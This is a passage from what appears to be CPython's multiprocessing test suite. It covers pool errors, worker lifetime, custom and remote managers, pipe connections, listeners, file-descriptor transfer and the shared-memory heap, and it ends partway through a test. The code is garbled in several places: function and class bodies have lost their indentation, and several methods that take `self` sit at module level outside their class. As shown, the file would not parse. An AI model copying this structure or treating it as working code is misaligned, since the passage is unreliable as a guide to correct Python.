                    p.apply(self._test_traceback)
                except Exception as e:
                    exc = e
                else:
                    self.fail('expected RuntimeError')
                p.join()
            self.assertIs(type(exc), RuntimeError)
            self.assertEqual(exc.args, (123,))
            cause = exc.__cause__
            self.assertIs(type(cause), multiprocessing.pool.RemoteTraceback)
            self.assertIn('raise RuntimeError(123) # some comment', cause.tb)

            with test.support.captured_stderr() as f1:
                try:
                    raise exc
                except RuntimeError:
                    sys.excepthook(*sys.exc_info())
            self.assertIn('raise RuntimeError(123) # some comment',
                          f1.getvalue())
            # _helper_reraises_exception should not make the error
            # a remote exception
            with self.Pool(1) as p:
                try:
                    p.map(sqr, exception_throwing_generator(1, -1), 1)
                except Exception as e:
                    exc = e
                else:
                    self.fail('expected SayWhenError')
                self.assertIs(type(exc), SayWhenError)
                self.assertIs(exc.__cause__, None)
                p.join()

    @classmethod
    def _test_wrapped_exception(cls):
        raise RuntimeError('foo')

    def test_wrapped_exception(self):
        # Issue #20980: Should not wrap exception when using thread pool
        with self.Pool(1) as p:
            with self.assertRaises(RuntimeError):
                p.apply(self._test_wrapped_exception)
            p.join()

    def test_map_no_failfast(self):
        # Issue #23992: the fail-fast behaviour when an exception is raised
        # during map() would make Pool.join() deadlock, because a worker
        # process would fill the result queue (after the result handler thread
        # terminated, hence not draining it anymore).
        t_start = time.monotonic()

        with self.assertRaises(ValueError):
            with self.Pool(2) as p:
                try:
                    p.map(raise_large_valuerror, [0, 1])
                finally:
                    time.sleep(0.5)
                    p.close()
                    p.join()

        # check that we indeed waited for all jobs
        self.assertGreater(time.monotonic() - t_start, 0.9)

    def test_release_task_refs(self):
        # Issue #29861: task arguments and results should not be kept
        # alive after we are done with them.
        objs = [CountedObject() for i in range(10)]
        refs = [weakref.ref(o) for o in objs]
        self.pool.map(identity, objs)

        del objs
        time.sleep(DELTA)  # let threaded cleanup code run
        self.assertEqual(set(wr() for wr in refs), {None})
        # With a process pool, copies of the objects are returned, check
        # they were released too.
        self.assertEqual(CountedObject.n_instances, 0)

    def test_enter(self):
        if self.TYPE == 'manager':
            self.skipTest("test not applicable to manager")

        pool = self.Pool(1)
        with pool:
            pass
            # call pool.terminate()
        # pool is no longer running

        with self.assertRaises(ValueError):
            # bpo-35477: pool.__enter__() fails if the pool is not running
            with pool:
                pass
        pool.join()

    def test_resource_warning(self):
        if self.TYPE == 'manager':
            self.skipTest("test not applicable to manager")

        pool = self.Pool(1)
        pool.terminate()
        pool.join()

        # force state to RUN to emit ResourceWarning in __del__()
        pool._state = multiprocessing.pool.RUN

        with support.check_warnings(('unclosed running multiprocessing pool',
                                     ResourceWarning)):
            pool = None
            support.gc_collect()
def raising():
    """Unconditionally raise ``KeyError('key')`` (error-callback helper)."""
    raise KeyError("key")
def unpickleable_result():
    """Return a lambda — a result that cannot be pickled back to the parent."""
    return lambda: 42
class _TestPoolWorkerErrors(BaseTestCase):
    """Pool behaviour when worker tasks raise or produce unpicklable results."""

    ALLOWED_TYPES = ('processes', )

    def test_async_error_callback(self):
        """error_callback receives the exception raised in the worker."""
        p = multiprocessing.Pool(2)
        scratchpad = [None]
        def errback(exc):
            scratchpad[0] = exc

        res = p.apply_async(raising, error_callback=errback)
        self.assertRaises(KeyError, res.get)
        self.assertTrue(scratchpad[0])
        self.assertIsInstance(scratchpad[0], KeyError)

        p.close()
        p.join()

    def test_unpickleable_result(self):
        from multiprocessing.pool import MaybeEncodingError
        p = multiprocessing.Pool(2)

        # Make sure we don't lose pool processes because of encoding errors.
        for iteration in range(20):
            scratchpad = [None]
            def errback(exc):
                scratchpad[0] = exc

            res = p.apply_async(unpickleable_result, error_callback=errback)
            self.assertRaises(MaybeEncodingError, res.get)
            wrapped = scratchpad[0]
            self.assertTrue(wrapped)
            self.assertIsInstance(scratchpad[0], MaybeEncodingError)
            self.assertIsNotNone(wrapped.exc)
            self.assertIsNotNone(wrapped.value)

        p.close()
        p.join()
class _TestPoolWorkerLifetime(BaseTestCase):
    """Tests for the maxtasksperchild worker-replacement machinery."""

    ALLOWED_TYPES = ('processes', )

    def test_pool_worker_lifetime(self):
        """Workers are replaced after serving maxtasksperchild tasks."""
        p = multiprocessing.Pool(3, maxtasksperchild=10)
        self.assertEqual(3, len(p._pool))
        origworkerpids = [w.pid for w in p._pool]
        # Run many tasks so each worker gets replaced (hopefully)
        results = []
        for i in range(100):
            results.append(p.apply_async(sqr, (i, )))
        # Fetch the results and verify we got the right answers,
        # also ensuring all the tasks have completed.
        for (j, res) in enumerate(results):
            self.assertEqual(res.get(), sqr(j))
        # Refill the pool
        p._repopulate_pool()
        # Wait until all workers are alive
        # (countdown * DELTA = 5 seconds max startup process time)
        countdown = 50
        while countdown and not all(w.is_alive() for w in p._pool):
            countdown -= 1
            time.sleep(DELTA)
        finalworkerpids = [w.pid for w in p._pool]
        # All pids should be assigned. See issue #7805.
        self.assertNotIn(None, origworkerpids)
        self.assertNotIn(None, finalworkerpids)
        # Finally, check that the worker pids have changed
        self.assertNotEqual(sorted(origworkerpids), sorted(finalworkerpids))
        p.close()
        p.join()

    def test_pool_worker_lifetime_early_close(self):
        # Issue #10332: closing a pool whose workers have limited lifetimes
        # before all the tasks completed would make join() hang.
        p = multiprocessing.Pool(3, maxtasksperchild=1)
        results = []
        for i in range(6):
            results.append(p.apply_async(sqr, (i, 0.3)))
        p.close()
        p.join()
        # check the results
        for (j, res) in enumerate(results):
            self.assertEqual(res.get(), sqr(j))

    def test_worker_finalization_via_atexit_handler_of_multiprocessing(self):
        # tests cases against bpo-38744 and bpo-39360
        cmd = '''if 1:
            from multiprocessing import Pool
            problem = None
            class A:
                def __init__(self):
                    self.pool = Pool(processes=1)
            def test():
                global problem
                problem = A()
                problem.pool.map(float, tuple(range(10)))
            if __name__ == "__main__":
                test()
        '''
        rc, out, err = test.support.script_helper.assert_python_ok('-c', cmd)
        self.assertEqual(rc, 0)
#
# Test of creating a customized manager class
#
from multiprocessing.managers import BaseManager, BaseProxy, RemoteError
class FooBar(object):
    """Target class registered with MyManager under 'Foo' and 'Bar'."""

    def f(self):
        """Well-behaved public method (exposed by default)."""
        return 'f()'

    def g(self):
        """Public method that always fails."""
        raise ValueError

    def _h(self):
        """Underscore method, proxied only when explicitly exposed."""
        return '_h()'
def baz():
    """Generate the squares of 0..9; registered with a custom proxy type."""
    for n in range(10):
        yield n * n
class IteratorProxy(BaseProxy):
    """Proxy that forwards the iterator protocol to its referent."""

    _exposed_ = ('__next__',)

    def __iter__(self):
        # The proxy itself is the iterator.
        return self

    def __next__(self):
        # Delegate to the referent's __next__ in the manager process.
        return self._callmethod('__next__')
class MyManager(BaseManager):
    """Customized manager used by _TestMyManager."""
    pass

MyManager.register('Foo', callable=FooBar)
# For 'Bar' only 'f' and '_h' are exposed on the proxy.
MyManager.register('Bar', callable=FooBar, exposed=('f', '_h'))
# baz() yields values, so its proxy must support the iterator protocol.
MyManager.register('baz', callable=baz, proxytype=IteratorProxy)
class _TestMyManager(BaseTestCase):
    """Tests for creating a customized manager class (MyManager)."""

    ALLOWED_TYPES = ('manager',)

    def test_mymanager(self):
        """Explicit start()/shutdown() lifecycle."""
        manager = MyManager()
        manager.start()
        self.common(manager)
        manager.shutdown()

        # bpo-30356: BaseManager._finalize_manager() sends SIGTERM
        # to the manager process if it takes longer than 1 second to stop,
        # which happens on slow buildbots.
        self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))

    def test_mymanager_context(self):
        """The context-manager protocol starts and stops the manager."""
        with MyManager() as manager:
            self.common(manager)
        # bpo-30356: BaseManager._finalize_manager() sends SIGTERM
        # to the manager process if it takes longer than 1 second to stop,
        # which happens on slow buildbots.
        self.assertIn(manager._process.exitcode, (0, -signal.SIGTERM))

    def test_mymanager_context_prestarted(self):
        """Entering an already-started manager must not restart it."""
        manager = MyManager()
        manager.start()
        with manager:
            self.common(manager)
        self.assertEqual(manager._process.exitcode, 0)

    def common(self, manager):
        # Shared assertions about which methods the registered proxies expose.
        foo = manager.Foo()
        bar = manager.Bar()
        baz = manager.baz()

        foo_methods = [name for name in ('f', 'g', '_h') if hasattr(foo, name)]
        bar_methods = [name for name in ('f', 'g', '_h') if hasattr(bar, name)]

        self.assertEqual(foo_methods, ['f', 'g'])
        self.assertEqual(bar_methods, ['f', '_h'])

        self.assertEqual(foo.f(), 'f()')
        self.assertRaises(ValueError, foo.g)
        self.assertEqual(foo._callmethod('f'), 'f()')
        self.assertRaises(RemoteError, foo._callmethod, '_h')

        self.assertEqual(bar.f(), 'f()')
        self.assertEqual(bar._h(), '_h()')
        self.assertEqual(bar._callmethod('f'), 'f()')
        self.assertEqual(bar._callmethod('_h'), '_h()')

        self.assertEqual(list(baz), [i*i for i in range(10)])
#
# Test of connecting to a remote server and using xmlrpclib for serialization
#
_queue = pyqueue.Queue()
def get_queue():
return _queue
class QueueManager(BaseManager):
    '''manager class used by server process'''

# Server side: expose get_queue() so clients can fetch the shared queue.
QueueManager.register('get_queue', callable=get_queue)
class QueueManager2(BaseManager):
    '''manager class which specifies the same interface as QueueManager'''

# Client side: no callable — only the method name is declared, the actual
# call is forwarded to the remote server.
QueueManager2.register('get_queue')


# Serializer used by the remote-manager tests below.
SERIALIZER = 'xmlrpclib'
class _TestRemoteManager(BaseTestCase):
    """Connect to a remote manager server using xmlrpclib serialization."""

    ALLOWED_TYPES = ('manager',)
    # Round-trippable sample values, including non-ASCII text and bytes.
    values = ['hello world', None, True, 2.25,
              'hall\xe5 v\xe4rlden',
              '\u043f\u0440\u0438\u0432\u0456\u0442 \u0441\u0432\u0456\u0442',
              b'hall\xe5 v\xe4rlden',
             ]
    result = values[:]

    @classmethod
    def _putter(cls, address, authkey):
        # Child process: connect to the server and push the test values.
        manager = QueueManager2(
            address=address, authkey=authkey, serializer=SERIALIZER
            )
        manager.connect()
        queue = manager.get_queue()
        # Note that xmlrpclib will deserialize object as a list not a tuple
        queue.put(tuple(cls.values))

    def test_remote(self):
        authkey = os.urandom(32)

        manager = QueueManager(
            address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER
            )
        manager.start()
        self.addCleanup(manager.shutdown)

        p = self.Process(target=self._putter, args=(manager.address, authkey))
        p.daemon = True
        p.start()

        manager2 = QueueManager2(
            address=manager.address, authkey=authkey, serializer=SERIALIZER
            )
        manager2.connect()
        queue = manager2.get_queue()

        self.assertEqual(queue.get(), self.result)

        # Because we are using xmlrpclib for serialization instead of
        # pickle this will cause a serialization error.
        self.assertRaises(Exception, queue.put, time.sleep)

        # Make queue finalizer run before the server is stopped
        del queue
@hashlib_helper.requires_hashdigest('md5')
class _TestManagerRestart(BaseTestCase):
    """A manager can be shut down and restarted on the same address."""

    @classmethod
    def _putter(cls, address, authkey):
        # Child process: connect and deposit a single message.
        manager = QueueManager(
            address=address, authkey=authkey, serializer=SERIALIZER)
        manager.connect()
        queue = manager.get_queue()
        queue.put('hello world')

    def test_rapid_restart(self):
        authkey = os.urandom(32)
        manager = QueueManager(
            address=(socket_helper.HOST, 0), authkey=authkey, serializer=SERIALIZER)
        try:
            srvr = manager.get_server()
            addr = srvr.address
            # Close the connection.Listener socket which gets opened as a part
            # of manager.get_server(). It's not needed for the test.
            srvr.listener.close()
            manager.start()

            p = self.Process(target=self._putter, args=(manager.address, authkey))
            p.start()
            p.join()
            queue = manager.get_queue()
            self.assertEqual(queue.get(), 'hello world')
            del queue
        finally:
            if hasattr(manager, "shutdown"):
                manager.shutdown()

        # Restart immediately on the address that was just released.
        manager = QueueManager(
            address=addr, authkey=authkey, serializer=SERIALIZER)
        try:
            manager.start()
            self.addCleanup(manager.shutdown)
        except OSError as e:
            if e.errno != errno.EADDRINUSE:
                raise
            # Retry after some time, in case the old socket was lingering
            # (sporadic failure on buildbots)
            time.sleep(1.0)
            manager = QueueManager(
                address=addr, authkey=authkey, serializer=SERIALIZER)
            if hasattr(manager, "shutdown"):
                self.addCleanup(manager.shutdown)
#
#
#
# Empty byte-string used by _TestConnection._echo to signal end-of-stream.
SENTINEL = latin('')
class _TestConnection(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
@classmethod
def _echo(cls, conn):
for msg in iter(conn.recv_bytes, SENTINEL):
conn.send_bytes(msg)
conn.close()
def test_connection(self):
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
seq = [1, 2.25, None]
msg = latin('hello world')
longmsg = msg * 10
arr = array.array('i', list(range(4)))
if self.TYPE == 'processes':
self.assertEqual(type(conn.fileno()), int)
self.assertEqual(conn.send(seq), None)
self.assertEqual(conn.recv(), seq)
self.assertEqual(conn.send_bytes(msg), None)
self.assertEqual(conn.recv_bytes(), msg)
if self.TYPE == 'processes':
buffer = array.array('i', [0]*10)
expected = list(arr) + [0] * (10 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = array.array('i', [0]*10)
expected = [0] * 3 + list(arr) + [0] * (10 - 3 - len(arr))
self.assertEqual(conn.send_bytes(arr), None)
self.assertEqual(conn.recv_bytes_into(buffer, 3 * buffer.itemsize),
len(arr) * buffer.itemsize)
self.assertEqual(list(buffer), expected)
buffer = bytearray(latin(' ' * 40))
self.assertEqual(conn.send_bytes(longmsg), None)
try:
res = conn.recv_bytes_into(buffer)
except multiprocessing.BufferTooShort as e:
self.assertEqual(e.args, (longmsg,))
else:
self.fail('expected BufferTooShort, got %s' % res)
poll = TimingWrapper(conn.poll)
self.assertEqual(poll(), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(-1), False)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(poll(TIMEOUT1), False)
self.assertTimingAlmostEqual(poll.elapsed, TIMEOUT1)
conn.send(None)
time.sleep(.1)
self.assertEqual(poll(TIMEOUT1), True)
self.assertTimingAlmostEqual(poll.elapsed, 0)
self.assertEqual(conn.recv(), None)
really_big_msg = latin('X') * (1024 * 1024 * 16) # 16Mb
conn.send_bytes(really_big_msg)
self.assertEqual(conn.recv_bytes(), really_big_msg)
conn.send_bytes(SENTINEL) # tell child to quit
child_conn.close()
if self.TYPE == 'processes':
self.assertEqual(conn.readable, True)
self.assertEqual(conn.writable, True)
self.assertRaises(EOFError, conn.recv)
self.assertRaises(EOFError, conn.recv_bytes)
p.join()
def test_duplex_false(self):
reader, writer = self.Pipe(duplex=False)
self.assertEqual(writer.send(1), None)
self.assertEqual(reader.recv(), 1)
if self.TYPE == 'processes':
self.assertEqual(reader.readable, True)
self.assertEqual(reader.writable, False)
self.assertEqual(writer.readable, False)
self.assertEqual(writer.writable, True)
self.assertRaises(OSError, reader.send, 2)
self.assertRaises(OSError, writer.recv)
self.assertRaises(OSError, writer.poll)
def test_spawn_close(self):
# We test that a pipe connection can be closed by parent
# process immediately after child is spawned. On Windows this
# would have sometimes failed on old versions because
# child_conn would be closed before the child got a chance to
# duplicate it.
conn, child_conn = self.Pipe()
p = self.Process(target=self._echo, args=(child_conn,))
p.daemon = True
p.start()
child_conn.close() # this might complete before child initializes
msg = latin('hello')
conn.send_bytes(msg)
self.assertEqual(conn.recv_bytes(), msg)
conn.send_bytes(SENTINEL)
conn.close()
p.join()
def test_sendbytes(self):
if self.TYPE != 'processes':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
msg = latin('abcdefghijklmnopqrstuvwxyz')
a, b = self.Pipe()
a.send_bytes(msg)
self.assertEqual(b.recv_bytes(), msg)
a.send_bytes(msg, 5)
self.assertEqual(b.recv_bytes(), msg[5:])
a.send_bytes(msg, 7, 8)
self.assertEqual(b.recv_bytes(), msg[7:7+8])
a.send_bytes(msg, 26)
self.assertEqual(b.recv_bytes(), latin(''))
a.send_bytes(msg, 26, 0)
self.assertEqual(b.recv_bytes(), latin(''))
self.assertRaises(ValueError, a.send_bytes, msg, 27)
self.assertRaises(ValueError, a.send_bytes, msg, 22, 5)
self.assertRaises(ValueError, a.send_bytes, msg, 26, 1)
self.assertRaises(ValueError, a.send_bytes, msg, -1)
self.assertRaises(ValueError, a.send_bytes, msg, 4, -1)
@classmethod
def _is_fd_assigned(cls, fd):
try:
os.fstat(fd)
except OSError as e:
if e.errno == errno.EBADF:
return False
raise
else:
return True
@classmethod
def _writefd(cls, conn, data, create_dummy_fds=False):
if create_dummy_fds:
for i in range(0, 256):
if not cls._is_fd_assigned(i):
os.dup2(conn.fileno(), i)
fd = reduction.recv_handle(conn)
if msvcrt:
fd = msvcrt.open_osfhandle(fd, os.O_WRONLY)
os.write(fd, data)
os.close(fd)
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
def test_fd_transfer(self):
if self.TYPE != 'processes':
self.skipTest("only makes sense with processes")
conn, child_conn = self.Pipe(duplex=True)
p = self.Process(target=self._writefd, args=(child_conn, b"foo"))
p.daemon = True
p.start()
self.addCleanup(test.support.unlink, test.support.TESTFN)
with open(test.support.TESTFN, "wb") as f:
fd = f.fileno()
if msvcrt:
fd = msvcrt.get_osfhandle(fd)
reduction.send_handle(conn, fd, p.pid)
p.join()
with open(test.support.TESTFN, "rb") as f:
self.assertEqual(f.read(), b"foo")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32",
                 "test semantics don't make sense on Windows")
@unittest.skipIf(MAXFD <= 256,
                 "largest assignable fd number is too small")
@unittest.skipUnless(hasattr(os, "dup2"),
                     "test needs os.dup2()")
def test_large_fd_transfer(self):
    # With fd > 256 (issue #11657)
    if self.TYPE != 'processes':
        self.skipTest("only makes sense with processes")
    conn, child_conn = self.Pipe(duplex=True)

    # The child (via create_dummy_fds=True in _writefd) fills all fds
    # below 256, so the received descriptor must be large as well.
    p = self.Process(target=self._writefd, args=(child_conn, b"bar", True))
    p.daemon = True
    p.start()
    self.addCleanup(test.support.unlink, test.support.TESTFN)
    with open(test.support.TESTFN, "wb") as f:
        fd = f.fileno()
        # Duplicate the file's fd onto an unused descriptor >= 256 so the
        # transfer exercises the large-fd code path.
        for newfd in range(256, MAXFD):
            if not self._is_fd_assigned(newfd):
                break
        else:
            self.fail("could not find an unassigned large file descriptor")
        os.dup2(fd, newfd)
        try:
            reduction.send_handle(conn, newfd, p.pid)
        finally:
            os.close(newfd)
    p.join()
    with open(test.support.TESTFN, "rb") as f:
        self.assertEqual(f.read(), b"bar")
@classmethod
def _send_data_without_fd(cls, conn):
    """Child-process helper: write one byte on the connection's socket
    without attaching a file descriptor in ancillary data, so that a
    recv_handle() on the other end must fail.
    """
    # Fixed: first parameter of a @classmethod is conventionally ``cls``,
    # not ``self`` (matches the other classmethod helpers in this class).
    os.write(conn.fileno(), b"\0")
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@unittest.skipIf(sys.platform == "win32", "doesn't make sense on Windows")
def test_missing_fd_transfer(self):
    # Check that exception is raised when received data is not
    # accompanied by a file descriptor in ancillary data.
    if self.TYPE != 'processes':
        self.skipTest("only makes sense with processes")
    conn, child_conn = self.Pipe(duplex=True)

    p = self.Process(target=self._send_data_without_fd, args=(child_conn,))
    p.daemon = True
    p.start()
    self.assertRaises(RuntimeError, reduction.recv_handle, conn)
    p.join()
def test_context(self):
    """Connections work as context managers; for real processes both
    endpoints are closed (and unusable) after leaving the block."""
    a, b = self.Pipe()

    with a, b:
        a.send(1729)
        self.assertEqual(b.recv(), 1729)
        if self.TYPE == 'processes':
            self.assertFalse(a.closed)
            self.assertFalse(b.closed)

    if self.TYPE == 'processes':
        self.assertTrue(a.closed)
        self.assertTrue(b.closed)
        self.assertRaises(OSError, a.recv)
        self.assertRaises(OSError, b.recv)
class _TestListener(BaseTestCase):
    """Tests for multiprocessing.connection.Listener."""

    ALLOWED_TYPES = ('processes',)

    def test_multiple_bind(self):
        # Binding a second listener to an address already in use must fail.
        for family in self.connection.families:
            l = self.connection.Listener(family=family)
            self.addCleanup(l.close)
            self.assertRaises(OSError, self.connection.Listener,
                              l.address, family)

    def test_context(self):
        # Listener, Client and accepted connections all support the
        # context-manager protocol; everything is closed on exit.
        with self.connection.Listener() as l:
            with self.connection.Client(l.address) as c:
                with l.accept() as d:
                    c.send(1729)
                    self.assertEqual(d.recv(), 1729)

        if self.TYPE == 'processes':
            self.assertRaises(OSError, l.accept)

    @unittest.skipUnless(util.abstract_sockets_supported,
                         "test needs abstract socket support")
    def test_abstract_socket(self):
        # Linux abstract-namespace socket (address starting with NUL byte).
        with self.connection.Listener("\0something") as listener:
            with self.connection.Client(listener.address) as client:
                with listener.accept() as d:
                    client.send(1729)
                    self.assertEqual(d.recv(), 1729)

        if self.TYPE == 'processes':
            self.assertRaises(OSError, listener.accept)
class _TestListenerClient(BaseTestCase):
    """Tests pairing connection.Listener with connection.Client."""

    ALLOWED_TYPES = ('processes', 'threads')

    @classmethod
    def _test(cls, address):
        # Child helper: connect to *address* and send a greeting.
        conn = cls.connection.Client(address)
        conn.send('hello')
        conn.close()

    def test_listener_client(self):
        for family in self.connection.families:
            l = self.connection.Listener(family=family)
            p = self.Process(target=self._test, args=(l.address,))
            p.daemon = True
            p.start()
            conn = l.accept()
            self.assertEqual(conn.recv(), 'hello')
            p.join()
            l.close()

    def test_issue14725(self):
        l = self.connection.Listener()
        p = self.Process(target=self._test, args=(l.address,))
        p.daemon = True
        p.start()
        time.sleep(1)
        # On Windows the client process should by now have connected,
        # written data and closed the pipe handle.  This causes
        # ConnectNamedPipe() to fail with ERROR_NO_DATA.  See Issue
        # 14725.
        conn = l.accept()
        self.assertEqual(conn.recv(), 'hello')
        conn.close()
        p.join()
        l.close()

    def test_issue16955(self):
        # poll() must see data already buffered in the connection.
        for fam in self.connection.families:
            l = self.connection.Listener(family=fam)
            c = self.connection.Client(l.address)
            a = l.accept()
            a.send_bytes(b"hello")
            self.assertTrue(c.poll(1))
            a.close()
            c.close()
            l.close()
class _TestPoll(BaseTestCase):
    """Tests for Connection.poll() semantics."""

    ALLOWED_TYPES = ('processes', 'threads')

    def test_empty_string(self):
        # An empty message still makes poll() report readability.
        a, b = self.Pipe()
        self.assertEqual(a.poll(), False)
        b.send_bytes(b'')
        self.assertEqual(a.poll(), True)
        self.assertEqual(a.poll(), True)

    @classmethod
    def _child_strings(cls, conn, strings):
        # Child helper: send each message with a small delay between them.
        for s in strings:
            time.sleep(0.1)
            conn.send_bytes(s)
        conn.close()

    def test_strings(self):
        strings = (b'hello', b'', b'a', b'b', b'', b'bye', b'', b'lop')
        a, b = self.Pipe()
        p = self.Process(target=self._child_strings, args=(b, strings))
        p.start()

        for s in strings:
            # Wait (up to ~2 seconds) for poll() to report the message.
            for i in range(200):
                if a.poll(0.01):
                    break
            x = a.recv_bytes()
            self.assertEqual(s, x)

        p.join()

    @classmethod
    def _child_boundaries(cls, r):
        # Polling may "pull" a message in to the child process, but we
        # don't want it to pull only part of a message, as that would
        # corrupt the pipe for any other processes which might later
        # read from it.
        r.poll(5)

    def test_boundaries(self):
        r, w = self.Pipe(False)
        p = self.Process(target=self._child_boundaries, args=(r,))
        p.start()
        time.sleep(2)
        L = [b"first", b"second"]
        for obj in L:
            w.send_bytes(obj)
        w.close()
        p.join()
        # Whatever the child's poll() left behind must be a whole message.
        self.assertIn(r.recv_bytes(), L)

    @classmethod
    def _child_dont_merge(cls, b):
        b.send_bytes(b'a')
        b.send_bytes(b'b')
        b.send_bytes(b'cd')

    def test_dont_merge(self):
        # Distinct send_bytes() calls must stay distinct messages.
        a, b = self.Pipe()
        self.assertEqual(a.poll(0.0), False)
        self.assertEqual(a.poll(0.1), False)

        p = self.Process(target=self._child_dont_merge, args=(b,))
        p.start()

        self.assertEqual(a.recv_bytes(), b'a')
        self.assertEqual(a.poll(1.0), True)
        self.assertEqual(a.poll(1.0), True)
        self.assertEqual(a.recv_bytes(), b'b')
        self.assertEqual(a.poll(1.0), True)
        self.assertEqual(a.poll(1.0), True)
        self.assertEqual(a.poll(0.0), True)
        self.assertEqual(a.recv_bytes(), b'cd')

        p.join()
#
# Test of sending connection and socket objects between processes
#
@unittest.skipUnless(HAS_REDUCTION, "test needs multiprocessing.reduction")
@hashlib_helper.requires_hashdigest('md5')
class _TestPicklingConnections(BaseTestCase):
    """Test sending Connection and socket objects between processes."""

    ALLOWED_TYPES = ('processes',)

    @classmethod
    def tearDownClass(cls):
        from multiprocessing import resource_sharer
        # The resource sharer's background thread is started lazily when
        # connections/sockets get pickled; stop it so it does not outlive
        # these tests.
        resource_sharer.stop(timeout=support.LONG_TIMEOUT)

    @classmethod
    def _listener(cls, conn, families):
        # Child helper: for each family create a listener, report its
        # address over *conn*, then send the accepted connection object
        # itself back (exercising connection pickling).
        for fam in families:
            l = cls.connection.Listener(family=fam)
            conn.send(l.address)
            new_conn = l.accept()
            conn.send(new_conn)
            new_conn.close()
            l.close()

        # Same dance with a plain socket (exercising socket pickling).
        l = socket.create_server((socket_helper.HOST, 0))
        conn.send(l.getsockname())
        new_conn, addr = l.accept()
        conn.send(new_conn)
        new_conn.close()
        l.close()

        conn.recv()

    @classmethod
    def _remote(cls, conn):
        # Child helper: connect to each received address and echo the
        # accompanying message upper-cased; a None sentinel ends the loop.
        for (address, msg) in iter(conn.recv, None):
            client = cls.connection.Client(address)
            client.send(msg.upper())
            client.close()

        address, msg = conn.recv()
        client = socket.socket()
        client.connect(address)
        client.sendall(msg.upper())
        client.close()

        conn.close()

    def test_pickling(self):
        families = self.connection.families

        lconn, lconn0 = self.Pipe()
        lp = self.Process(target=self._listener, args=(lconn0, families))
        lp.daemon = True
        lp.start()
        lconn0.close()

        rconn, rconn0 = self.Pipe()
        rp = self.Process(target=self._remote, args=(rconn0,))
        rp.daemon = True
        rp.start()
        rconn0.close()

        for fam in families:
            msg = ('This connection uses family %s' % fam).encode('ascii')
            address = lconn.recv()
            rconn.send((address, msg))
            new_conn = lconn.recv()
            self.assertEqual(new_conn.recv(), msg.upper())

        rconn.send(None)

        msg = latin('This connection uses a normal socket')
        address = lconn.recv()
        rconn.send((address, msg))
        new_conn = lconn.recv()
        buf = []
        while True:
            s = new_conn.recv(100)
            if not s:
                break
            buf.append(s)
        buf = b''.join(buf)
        self.assertEqual(buf, msg.upper())
        new_conn.close()

        lconn.send(None)

        rconn.close()
        lconn.close()

        lp.join()
        rp.join()

    @classmethod
    def child_access(cls, conn):
        # Child helper for test_access: use the write end then the read
        # end of a simplex pipe received over *conn*.
        w = conn.recv()
        w.send('all is well')
        w.close()

        r = conn.recv()
        msg = r.recv()
        conn.send(msg*2)

        conn.close()

    def test_access(self):
        # On Windows, if we do not specify a destination pid when
        # using DupHandle then we need to be careful to use the
        # correct access flags for DuplicateHandle(), or else
        # DupHandle.detach() will raise PermissionError.  For example,
        # for a read only pipe handle we should use
        # access=FILE_GENERIC_READ.  (Unfortunately
        # DUPLICATE_SAME_ACCESS does not work.)
        conn, child_conn = self.Pipe()
        p = self.Process(target=self.child_access, args=(child_conn,))
        p.daemon = True
        p.start()
        child_conn.close()

        r, w = self.Pipe(duplex=False)
        conn.send(w)
        w.close()
        self.assertEqual(r.recv(), 'all is well')
        r.close()

        r, w = self.Pipe(duplex=False)
        conn.send(r)
        r.close()
        w.send('foobar')
        w.close()
        self.assertEqual(conn.recv(), 'foobar'*2)

        p.join()
#
#
#
class _TestHeap(BaseTestCase):
    """Tests for the private multiprocessing.heap arena allocator."""

    ALLOWED_TYPES = ('processes',)

    def setUp(self):
        super().setUp()
        # Make pristine heap for these tests
        self.old_heap = multiprocessing.heap.BufferWrapper._heap
        multiprocessing.heap.BufferWrapper._heap = multiprocessing.heap.Heap()

    def tearDown(self):
        multiprocessing.heap.BufferWrapper._heap = self.old_heap
        super().tearDown()

    def test_heap(self):
        """Stress the allocator, then verify the free/occupied bookkeeping
        tiles each arena exactly and that freeing everything empties it."""
        iterations = 5000
        maxblocks = 50
        blocks = []

        # get the heap object
        heap = multiprocessing.heap.BufferWrapper._heap
        heap._DISCARD_FREE_SPACE_LARGER_THAN = 0

        # create and destroy lots of blocks of different sizes
        for i in range(iterations):
            size = int(random.lognormvariate(0, 1) * 1000)
            b = multiprocessing.heap.BufferWrapper(size)
            blocks.append(b)
            if len(blocks) > maxblocks:
                i = random.randrange(maxblocks)
                del blocks[i]
            del b

        # verify the state of the heap
        with heap._lock:
            all = []
            free = 0
            occupied = 0
            for L in list(heap._len_to_seq.values()):
                # count all free blocks in arenas
                for arena, start, stop in L:
                    all.append((heap._arenas.index(arena), start, stop,
                                stop-start, 'free'))
                    free += (stop-start)
            for arena, arena_blocks in heap._allocated_blocks.items():
                # count all allocated blocks in arenas
                for start, stop in arena_blocks:
                    all.append((heap._arenas.index(arena), start, stop,
                                stop-start, 'occupied'))
                    occupied += (stop-start)

            self.assertEqual(free + occupied,
                             sum(arena.size for arena in heap._arenas))

            all.sort()

            # Blocks must tile each arena with no gaps and no overlaps.
            for i in range(len(all)-1):
                (arena, start, stop) = all[i][:3]
                (narena, nstart, nstop) = all[i+1][:3]
                if arena != narena:
                    # Two different arenas
                    self.assertEqual(stop, heap._arenas[arena].size)  # last block
                    self.assertEqual(nstart, 0)  # first block
                else:
                    # Same arena: two adjacent blocks
                    self.assertEqual(stop, nstart)

        # test free'ing all blocks
        random.shuffle(blocks)
        while blocks:
            blocks.pop()

        self.assertEqual(heap._n_frees, heap._n_mallocs)
        self.assertEqual(len(heap._pending_free_blocks), 0)
        self.assertEqual(len(heap._arenas), 0)
        self.assertEqual(len(heap._allocated_blocks), 0, heap._allocated_blocks)
        self.assertEqual(len(heap._len_to_seq), 0)

    def test_free_from_gc(self):
        # Check that freeing of blocks by the garbage collector doesn't deadlock
        # (issue #12352).
